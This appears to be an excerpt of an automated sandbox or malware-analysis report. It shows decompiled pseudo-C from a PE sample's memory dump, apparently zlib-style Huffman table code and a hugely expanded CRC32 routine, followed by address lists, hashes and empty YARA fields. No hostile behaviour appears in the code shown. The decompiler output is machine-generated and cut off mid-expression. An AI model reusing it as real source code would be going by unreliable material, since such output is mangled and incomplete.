				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v180;
				signed int _v184;
				signed int _v244;
				signed int _t190;
				intOrPtr* _t192;
				signed int _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				signed int _t199;
				intOrPtr _t203;
				intOrPtr _t207;
				signed char* _t211;
				signed char _t212;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr* _t220;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t228;
				intOrPtr _t229;
				signed int _t231;
				char _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t241;
				signed int _t242;
				intOrPtr _t243;
				signed int* _t244;
				signed int _t246;
				signed int _t247;
				signed int* _t248;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				signed int _t252;
				signed char _t257;
				signed int _t266;
				signed int _t269;
				signed char _t271;
				intOrPtr _t275;
				signed char* _t277;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t287;
				intOrPtr _t294;
				signed int _t296;
				intOrPtr* _t297;
				intOrPtr _t298;
				intOrPtr _t300;
				signed char _t302;
				void* _t306;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t319;
				intOrPtr _t320;
				unsigned int _t321;
				intOrPtr* _t322;
				void* _t323;

				_t248 = _a4;
				_t296 = _a8;
				_t280 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_t307 = _t296;
				do {
					_t190 =  *_t248;
					_t248 =  &(_t248[1]);
					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
					_t307 = _t307 - 1;
				} while (_t307 != 0);
				if(_v120 != _t296) {
					_t297 = _a28;
					_t241 = 1;
					_t192 =  &_v116;
					_t308 =  *_t297;
					_t249 = _t241;
					_a28 = _t308;
					while( *_t192 == _t280) {
						_t249 = _t249 + 1;
						_t192 = _t192 + 4;
						if(_t249 <= 0xf) {
							continue;
						}
						break;
					}
					_v8 = _t249;
					if(_t308 < _t249) {
						_a28 = _t249;
					}
					_t309 =  &_v60;
					_t193 = 0xf;
					while( *_t309 == _t280) {
						_t193 = _t193 - 1;
						_t309 = _t309 - 4;
						if(_t193 != _t280) {
							continue;
						}
						break;
					}
					_v28 = _t193;
					if(_a28 > _t193) {
						_a28 = _t193;
					}
					_t242 = _t241 << _t249;
					 *_t297 = _a28;
					if(_t249 >= _t193) {
						L20:
						_t312 = _t193 << 2;
						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
						_t250 = _t323 + _t312 - 0x74;
						_t243 = _t242 - _t298;
						_v52 = _t243;
						if(_t243 < 0) {
							goto L39;
						}
						_v180 = _t280;
						 *_t250 = _t298 + _t243;
						_t251 = 0;
						_t195 = _t193 - 1;
						if(_t195 == 0) {
							L24:
							_t244 = _a4;
							_t300 = 0;
							do {
								_t196 =  *_t244;
								_t244 =  &(_t244[1]);
								if(_t196 != _t280) {
									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
									_t280 = 0;
								}
								_t300 = _t300 + 1;
							} while (_t300 < _a8);
							_v12 = _v12 | 0xffffffff;
							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
							_v16 = _t280;
							_v20 = _a40;
							_t199 = _v8;
							_t246 =  ~_a28;
							_v184 = _t280;
							_v244 = _t280;
							_v32 = _t280;
							_a4 = _t280;
							if(_t199 > _v28) {
								L64:
								if(_v52 == _t280 || _v28 == 1) {
									L4:
									return 0;
								} else {
									_push(0xfffffffb);
									goto L67;
								}
							}
							_v48 = _t199 - 1;
							_v36 = _t323 + _t199 * 4 - 0x74;
							do {
								_t203 =  *_v36;
								_v24 = _t203 - 1;
								if(_t203 == 0) {
									goto L63;
								} else {
									goto L31;
								}
								do {
									L31:
									_t207 = _a28 + _t246;
									if(_v8 <= _t207) {
										L46:
										_v43 = _v8 - _t246;
										_t257 = _a40 + _a8 * 4;
										_t211 = _v20;
										if(_t211 < _t257) {
											_t212 =  *_t211;
											if(_t212 >= _a12) {
												_t214 = _t212 - _a12 << 2;
												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
												_t302 =  *(_t214 + _a16);
											} else {
												_t302 = _t212;
												asm("sbb cl, cl");
												_v44 = (_t257 & 0x000000a0) + 0x60;
											}
											_v20 =  &(_v20[4]);
											L52:
											_t313 = 1;
											_t314 = _t313 << _v8 - _t246;
											_t216 = _v16 >> _t246;
											if(_t216 >= _a4) {
												L56:
												_t217 = 1;
												_t218 = _t217 << _v48;
												_t266 = _v16;
												while((_t266 & _t218) != 0) {
													_t266 = _t266 ^ _t218;
													_t218 = _t218 >> 1;
												}
												_v16 = _t266 ^ _t218;
												_t220 = _t323 + _v12 * 4 - 0xb4;
												while(1) {
													_t315 = 1;
													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
														goto L62;
													}
													_v12 = _v12 - 1;
													_t220 = _t220 - 4;
													_t246 = _t246 - _a28;
												}
												goto L62;
											}
											_t277 = _v32 + _t216 * 8;
											do {
												_t216 = _t216 + _t314;
												 *_t277 = _v44;
												_t277[4] = _t302;
												_t277 = _t277 + (_t314 << 3);
											} while (_t216 < _a4);
											_t280 = 0;
											goto L56;
										}
										_v44 = 0xc0;
										goto L52;
									} else {
										goto L32;
									}
									do {
										L32:
										_t269 = _a28;
										_v12 = _v12 + 1;
										_t246 = _t246 + _t269;
										_v56 = _t207 + _t269;
										_t224 = _v28 - _t246;
										_a4 = _t224;
										if(_t224 > _t269) {
											_a4 = _t269;
										}
										_t271 = _v8 - _t246;
										_t225 = 1;
										_t226 = _t225 << _t271;
										_t282 = _v24 + 1;
										if(_t226 <= _t282) {
											L40:
											_t283 = 1;
											_t228 =  *_a36;
											_t284 = _t283 << _t271;
											_a4 = _t284;
											_t319 = _t228 + _t284;
											if(_t319 > 0x5a0) {
												goto L39;
											}
										} else {
											_t320 = _v36;
											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
											if(_t271 >= _a4) {
												goto L40;
											} else {
												goto L36;
											}
											while(1) {
												L36:
												_t271 = _t271 + 1;
												if(_t271 >= _a4) {
													goto L40;
												}
												_t294 =  *((intOrPtr*)(_t320 + 4));
												_t320 = _t320 + 4;
												_t237 = _t236 << 1;
												if(_t237 <= _t294) {
													goto L40;
												}
												_t236 = _t237 - _t294;
											}
											goto L40;
										}
										_t229 = _a32 + _t228 * 8;
										_v32 = _t229;
										_t287 = _t323 + _v12 * 4 - 0xf0;
										 *_t287 = _t229;
										 *_a36 = _t319;
										_t231 = _v12;
										if(_t231 == 0) {
											 *_a24 = _v32;
										} else {
											_t321 = _v16;
											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
											_t233 = _a28;
											_v44 = _t271;
											_v43 = _t233;
											_t235 = _t321 >> _t246 - _t233;
											_t275 =  *((intOrPtr*)(_t287 - 4));
											_t302 = (_v32 - _t275 >> 3) - _t235;
											 *(_t275 + _t235 * 8) = _v44;
											 *(_t275 + 4 + _t235 * 8) = _t302;
										}
										_t207 = _v56;
									} while (_v8 > _t207);
									_t280 = 0;
									goto L46;
									L62:
									_v24 = _v24 - 1;
								} while (_v24 != 0);
								L63:
								_v8 = _v8 + 1;
								_v36 = _v36 + 4;
								_v48 = _v48 + 1;
							} while (_v8 <= _v28);
							goto L64;
						}
						_t306 = 0;
						do {
							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
							_t306 = _t306 + 4;
							_t195 = _t195 - 1;
							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
						} while (_t195 != 0);
						goto L24;
					} else {
						_t322 = _t323 + _t249 * 4 - 0x74;
						while(1) {
							_t247 = _t242 -  *_t322;
							if(_t247 < 0) {
								break;
							}
							_t249 = _t249 + 1;
							_t322 = _t322 + 4;
							_t242 = _t247 << 1;
							if(_t249 < _t193) {
								continue;
							}
							goto L20;
						}
						L39:
						_push(0xfffffffd);
						L67:
						_pop(_t194);
						return _t194;
					}
				}
				 *_a24 = 0;
				 *_a28 = 0;
				goto L4;
			}







































































































                    0x00404c22
                    0x00404c28
                    0x00404c2b
                    0x00404c2d
                    0x00404c30
                    0x00404c33
                    0x00404c36
                    0x00404c39
                    0x00404c3c
                    0x00404c3f
                    0x00404c42
                    0x00404c45
                    0x00404c48
                    0x00404c4b
                    0x00404c4e
                    0x00404c51
                    0x00404c54
                    0x00404c57
                    0x00404c5a
                    0x00404c5d
                    0x00404c5f
                    0x00404c5f
                    0x00404c61
                    0x00404c64
                    0x00404c6c
                    0x00404c6c
                    0x00404c72
                    0x00404c85
                    0x00404c8a
                    0x00404c8b
                    0x00404c8e
                    0x00404c90
                    0x00404c92
                    0x00404c95
                    0x00404c99
                    0x00404c9a
                    0x00404ca0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404ca0
                    0x00404ca4
                    0x00404ca7
                    0x00404ca9
                    0x00404ca9
                    0x00404cae
                    0x00404cb1
                    0x00404cb2
                    0x00404cb6
                    0x00404cb7
                    0x00404cbc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404cbc
                    0x00404cc1
                    0x00404cc4
                    0x00404cc6
                    0x00404cc6
                    0x00404ccc
                    0x00404cd0
                    0x00404cd2
                    0x00404cea
                    0x00404cec
                    0x00404cef
                    0x00404cf3
                    0x00404cf7
                    0x00404cf9
                    0x00404cfc
                    0x00000000
                    0x00000000
                    0x00404d04
                    0x00404d0a
                    0x00404d0c
                    0x00404d0e
                    0x00404d0f
                    0x00404d24
                    0x00404d24
                    0x00404d27
                    0x00404d29
                    0x00404d29
                    0x00404d2b
                    0x00404d30
                    0x00404d32
                    0x00404d43
                    0x00404d47
                    0x00404d49
                    0x00404d49
                    0x00404d4b
                    0x00404d4c
                    0x00404d5b
                    0x00404d5f
                    0x00404d65
                    0x00404d68
                    0x00404d6b
                    0x00404d6e
                    0x00404d73
                    0x00404d79
                    0x00404d7f
                    0x00404d82
                    0x00404d85
                    0x00404f85
                    0x00404f88
                    0x00404c7e
                    0x00000000
                    0x00404f98
                    0x00404f98
                    0x00000000
                    0x00404f98
                    0x00404f88
                    0x00404d95
                    0x00404d98
                    0x00404d9b
                    0x00404d9e
                    0x00404da5
                    0x00404da8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404dae
                    0x00404dae
                    0x00404db1
                    0x00404db6
                    0x00404e9a
                    0x00404ea2
                    0x00404ea8
                    0x00404eab
                    0x00404eb0
                    0x00404eb8
                    0x00404ebd
                    0x00404ed9
                    0x00404ee2
                    0x00404ee8
                    0x00404ebf
                    0x00404ec4
                    0x00404ec6
                    0x00404ece
                    0x00404ece
                    0x00404eeb
                    0x00404eef
                    0x00404ef9
                    0x00404efa
                    0x00404efe
                    0x00404f03
                    0x00404f23
                    0x00404f28
                    0x00404f29
                    0x00404f2b
                    0x00404f2e
                    0x00404f32
                    0x00404f34
                    0x00404f34
                    0x00404f3d
                    0x00404f40
                    0x00404f47
                    0x00404f4b
                    0x00404f54
                    0x00000000
                    0x00000000
                    0x00404f56
                    0x00404f59
                    0x00404f5c
                    0x00404f5c
                    0x00000000
                    0x00404f47
                    0x00404f08
                    0x00404f0b
                    0x00404f0e
                    0x00404f10
                    0x00404f17
                    0x00404f1a
                    0x00404f1c
                    0x00404f21
                    0x00000000
                    0x00404f21
                    0x00404eb2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404dbc
                    0x00404dbc
                    0x00404dbc
                    0x00404dbf
                    0x00404dc4
                    0x00404dc6
                    0x00404dcc
                    0x00404dd0
                    0x00404dd3
                    0x00404dd5
                    0x00404dd5
                    0x00404de0
                    0x00404de2
                    0x00404de3
                    0x00404de5
                    0x00404de8
                    0x00404e17
                    0x00404e1c
                    0x00404e1d
                    0x00404e1f
                    0x00404e21
                    0x00404e24
                    0x00404e2d
                    0x00000000
                    0x00000000
                    0x00404dea
                    0x00404dea
                    0x00404df3
                    0x00404df8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404dfa
                    0x00404dfa
                    0x00404dfa
                    0x00404dfe
                    0x00000000
                    0x00000000
                    0x00404e00
                    0x00404e03
                    0x00404e06
                    0x00404e0a
                    0x00000000
                    0x00000000
                    0x00404e0c
                    0x00404e0c
                    0x00000000
                    0x00404dfa
                    0x00404e32
                    0x00404e38
                    0x00404e3b
                    0x00404e42
                    0x00404e47
                    0x00404e49
                    0x00404e4e
                    0x00404e8a
                    0x00404e50
                    0x00404e50
                    0x00404e56
                    0x00404e5d
                    0x00404e60
                    0x00404e65
                    0x00404e6c
                    0x00404e6e
                    0x00404e79
                    0x00404e7b
                    0x00404e7e
                    0x00404e7e
                    0x00404e8c
                    0x00404e8f
                    0x00404e98
                    0x00000000
                    0x00404f61
                    0x00404f64
                    0x00404f67
                    0x00404f6f
                    0x00404f6f
                    0x00404f72
                    0x00404f79
                    0x00404f7c
                    0x00000000
                    0x00404d9b
                    0x00404d11
                    0x00404d13
                    0x00404d13
                    0x00404d17
                    0x00404d1a
                    0x00404d1b
                    0x00404d1b
                    0x00000000
                    0x00404cd4
                    0x00404cd4
                    0x00404cd8
                    0x00404cd8
                    0x00404cda
                    0x00000000
                    0x00000000
                    0x00404ce0
                    0x00404ce1
                    0x00404ce4
                    0x00404ce8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404ce8
                    0x00404e10
                    0x00404e10
                    0x00404f9a
                    0x00404f9a
                    0x00000000
                    0x00404f9a
                    0x00404cd2
                    0x00404c77
                    0x00404c7c
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                    • Instruction ID: 9637f4fcf05056c634a246d4ec164b1eccd92df816b65a9601eba7856632ad8a
                    • Opcode Fuzzy Hash: 39bb7c4b20325c44dd8699449145d0d2bc85238f2d0020d1ee85a7bd7e705017
                    • Instruction Fuzzy Hash: 36D1F5B1A002199FDF14CFA9D9805EDBBB1FF88314F25826AD959B7390D734AA41CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040541F Relevance: .1, Instructions: 104COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040541F(signed int _a4, signed char* _a8, unsigned int _a12) {
				signed int _t35;
				signed char* _t73;
				signed char* _t74;
				signed char* _t75;
				signed char* _t76;
				signed char* _t77;
				signed char* _t78;
				signed char* _t79;
				unsigned int _t85;

				_t73 = _a8;
				if(_t73 != 0) {
					_t35 =  !_a4;
					if(_a12 >= 8) {
						_t85 = _a12 >> 3;
						do {
							_a12 = _a12 - 8;
							_t74 =  &(_t73[1]);
							_t75 =  &(_t74[1]);
							_t76 =  &(_t75[1]);
							_t77 =  &(_t76[1]);
							_t78 =  &(_t77[1]);
							_t79 =  &(_t78[1]);
							_t35 = ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 